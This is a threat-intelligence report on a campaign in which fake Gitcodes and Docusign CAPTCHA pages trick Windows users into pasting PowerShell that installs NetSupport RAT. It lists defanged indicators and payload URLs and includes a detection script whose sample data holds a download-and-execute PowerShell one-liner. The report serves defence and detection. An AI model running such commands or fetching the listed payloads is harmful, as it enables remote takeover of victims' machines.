
How Threat Actors Exploit Human Trust: A Breakdown of the 'Prove You Are Human' Malware Scheme

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).

Malicious Multi-Stage Downloader Powershell Scripts Identified

Our team identified malicious multi-stage downloader Powershell scripts hosted on multiple themed websites including Gitcodes and fake Docusign captcha verifications. These sites attempt to deceive users into copying and running an initial powershell script on their Windows Run command. Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines.

Malicious Powershell Scripts Hosted on Gitcodes

Malicious Powershell scripts were found to be hosted on instances of Gitcodes sites for the purpose of downloading second stage Powershell scripts. The second stage also functioned as downloaders, making 3 or more web requests to retrieve and execute a third stage of scripts from other domains, which then retrieve and run a fourth stage resulting in NetSupport RAT running on the victim host. 


Domain: gitcodes[.]org resolves to a website running a Gitcodes service titled “Gitcodes – #1 paste tool since 2002!” The paste is populated with a malicious PowerShell script that concatenates multiple strings to form a domain. It then issues a web request to that domain with a specified user agent and runs the script returned in the response.

In this instance, the script calls out to “http[:]//tradingviewtool[.]com” using the user agent “TradingView.”

The script retrieved from tradingviewtool[.]com subsequently issues additional web requests to download three files from a different domain, “tradingviewtoolz[.]com”, and also makes multiple requests to tradingviewtool[.]com. Initially the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a check-in that records the computer name at first execution. Once the script completes its intended purpose and cleans up its local artifacts, it calls out to the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name, likely signalling that the host is now infected.

As seen in the capture above, this second-stage script performs a series of actions to install a payload and make it persistent, while trying to hide its activity from the user. It functions as a downloader, retrieving NetSupport RAT and running it on the system. The three downloaded files include a legitimate 7-Zip executable, which the script uses to unpack “client32.exe”; it then creates a new entry for that file in the Windows Registry “Run” key of the current user. This ensures that `client32.exe` starts automatically every time the user logs in, establishing persistence for the malware. Naming the entry “My Support” is an attempt to make it look less suspicious in lists of startup programs.

Uncovering the Broader Malware Ecosystem Behind the Campaign

The observed infrastructure varied, but the combination of registration and website configuration characteristics, together with the repeated use of the same malicious payloads, enabled the identification of additional lure sites serving similar downloader scripts.

Registrar:

  • Cloudflare
  • NameCheap
  • NameSilo

NameServer: 

  • cloudflare[.]com
  • luxhost[.]org
  • namecheaphosting[.]com

SSL Issuer: WE1

Website Title contains Gitcodes

Example 1:

Example 2:

Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT

Pivoting on the NetSupport RAT samples being distributed and the associated infrastructure, additional malware distribution domains were identified, including websites spoofing Docusign. As with the Gitcodes sites, multiple stages of script downloaders were observed, resulting in NetSupport RAT being installed on victim machines.

An initial payload retrieves an “s.php” file from a domain spoofing Docusign. It then unzips the file and launches a script contained within it.

docusign.sa[.]com

The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is initially ROT13 encoded, likely as a layer of obfuscation to avoid signature-based detection. ROT13, or “rotate by 13,” is a form of Caesar cipher in which a simple letter substitution replaces each letter with the letter 13 positions after it in the alphabet. Because the alphabet has 26 letters, applying the operation a second time decodes the text.

The page is designed to look like a Cloudflare “Checking your browser” / CAPTCHA page mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Upon clicking, “s.php?an=0” is requested, likely to log the click attempt. The page then performs clipboard poisoning: an “unsecuredCopyToClipboard()” function is called, copying an encoded, multi-layered string to the user’s clipboard. The user is instructed to press Win+R, Ctrl+V, Enter, in other words to open the Windows Run prompt, paste in the malicious script, and run it.

Also on the s.php page, after the clipboard poisoning, an interval timer is set that makes an AJAX GET request to c.php every second. If c.php returns “1,” the current page (s.php) reloads (window.location.reload()). This is likely a C2 (command and control) style mechanism that waits for the victim to paste and run the PowerShell script on their machine.

The string copied to the user’s clipboard decodes to the following PowerShell script:

This script downloads a persistence payload, “wbdims.exe,” from GitHub. It then starts it as a process, creates a Windows Script Host COM object, and uses that object to create a shortcut in the Startup folder so the payload executes automatically when the user logs in.

While this payload was no longer available at the time of investigation, it is expected to check in with the delivery site via “docusign.sa[.]com/verification/c.php.” That check-in triggers the browser refresh, after which the page displays the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”

Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd

The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently goes through additional stages of file retrieval and execution, resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:

http[:]//mhousecreative[.]com

http[:]//170.130.55[.]203:443/fakeurl.htm

In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies on deceiving users into “verifying they are human” by copying and running a malicious PowerShell script on their machines. The multiple stages of scripts that download and run further scripts, which in turn download and run yet more scripts, are likely an attempt to evade detection and to be more resilient to security investigations and takedowns.

By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early-phase persistence files appear to be short lived or quickly identified and taken down, whereas the later stages appear to remain active for longer periods. This demonstrates the method’s somewhat effective disposable-pawn strategy combined with a more resilient late-game setup.
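Detection logic for the host-side behaviours described in both chains above (a Run-prompt PowerShell launch with a download-and-execute cradle, the HKCU Run value pointing at client32.exe, and the Startup-folder shortcut), written as an added example that is not code from the original report. The Sysmon-style events, file paths and SID are constructed sample data, and the rule names are this example's own.

```python
import re

# Constructed Sysmon-style events (EID 1 process create, EID 11 file create,
# EID 13 registry value set). Sample data only, not telemetry from the report.
SAMPLE_EVENTS = [
    {"eid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c \"iwr -UserAgent 'TradingView' ('https://' + 'lure' + '.invalid') | iex\""},
    {"eid": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\My Support",
     "details": r"C:\Users\victim\AppData\Roaming\My Support\client32.exe"},
    {"eid": 11, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wbdims.lnk"},
    {"eid": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
STARTUP = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)

def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))

def classify(event: dict) -> list[str]:
    """Return the names of the rules an event matches."""
    hits = []
    if event["eid"] == 1 and is_powershell(event["image"]):
        cmd = event["cmdline"]
        # A Run-prompt launch is parented by explorer.exe; the pasted one-liner
        # downloads and immediately executes, usually with a hidden window.
        if event["parent"].lower().endswith(r"\explorer.exe") and DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            hits.append("explorer_parented_powershell_cradle")
        if HIDDEN.search(cmd):
            hits.append("hidden_window")
    elif event["eid"] == 13 and RUN_KEY.search(event["target"]):
        if event["details"].lower().endswith("client32.exe"):  # NetSupport client binary
            hits.append("run_key_netsupport_client32")
    elif event["eid"] == 11 and is_powershell(event["image"]) and STARTUP.search(event["target"]):
        hits.append("powershell_startup_shortcut")  # WScript.Shell shortcut in Startup folder
    return hits

def scan(events: list[dict]) -> dict[str, int]:
    """Count rule hits across a batch of events."""
    counts: dict[str, int] = {}
    for ev in events:
        for rule in classify(ev):
            counts[rule] = counts.get(rule, 0) + 1
    return counts

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Any single rule is noisy on its own; correlating a cradle hit with a Run-key or Startup-folder hit from the same PowerShell process within a short window is what separates this chain from routine administration.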

The Widening Scope of Clipboard Poisoning Attacks

While the use of ROT13 encoding can make some detections more difficult, particularly those that depend on services that preprocess server scan data, the samples themselves still allow for reliable identification, for example through the consistent use of the same strings and comment values within the PHP code.

Pivots on the clipboard poisoning scripts identified several other nearly identical instances of the code on a wider range of spoofed content, including Okta and popular media apps. Additionally, Discord and GitHub were also identified as being used to host the next-stage malware, as in the following examples.

https[:]//oktacheck.it[.]com/s.php
https[:]//loyalcompany[.]net/s.php
https[:]//hubofnotion[.]com/steps.php

https[:]//raw.githubusercontent[.]com/MIGS2023/000/main/sihost.exe
https[:]//raw.githubusercontent[.]com/MIGS2023/000/main/svchost.exe

https[:]//cdn.discordapp[.]com/attachments/1212800072570241127/1213022984775106570/Netflix.scr?ex=65f3f1b5&is=65e17cb5&hm=a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d&

https[:]//cdn.discordapp[.]com/attachments/1212800072570241127/1213022984775106570/Spotify.scr?ex=65f3f1b5&is=65e17cb5&hm=a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d&

While attribution of this campaign is unclear, pivots on the associated infrastructure and malware identified reuse of associated NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace, and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, STORM-0408 and others.

Key Takeaways and Security Recommendations

This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous “verify you are human” CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.

Key Security Recommendations:

  • Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
  • Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
  • Verify the authenticity of websites: double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.

This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The “self-infect” tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.


IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

If the community has any additional input, please let us know.
